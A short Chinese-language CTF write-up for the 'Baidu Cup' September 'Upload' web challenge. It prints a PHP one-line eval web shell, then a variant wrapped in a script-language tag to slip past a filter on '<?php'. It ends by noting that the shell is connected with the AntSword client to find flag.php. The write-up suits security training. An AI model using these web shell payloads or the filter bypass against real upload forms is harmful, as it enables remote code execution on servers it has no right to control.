“百度杯”CTF比赛 九月场
Upload:
类型:web
题目描述:想怎么传就怎么传,就是这么任性。tips:flag在flag.php中
解题方法:打开靶机,获得题目链接是一个文件上传类型的:
看到文件上传,就想到一句话木马,先上传一个一句话木马上去:
<?php @eval ($_POST["1"]);?>
上传成功,我们点击这个上传成功的链接:
这里发现我们的<?php被过滤了,所以我们要用其他的php标记手法:
<script language="PHP">
@eval($_POST["pass"]);//php长标签
</script>
然后现在我们再上传我们的一句话木马
上传成功后再点击上传成功的链接,返回的是一片空白,说明我们的一句话木马上传成功了
现在用中国蚁剑来连:
连接成功!
在目录下找到flag.php
标签:CTF,Upload,flag,木马,php,上传,百度 From: https://www.cnblogs.com/xyweiwen/p/18104610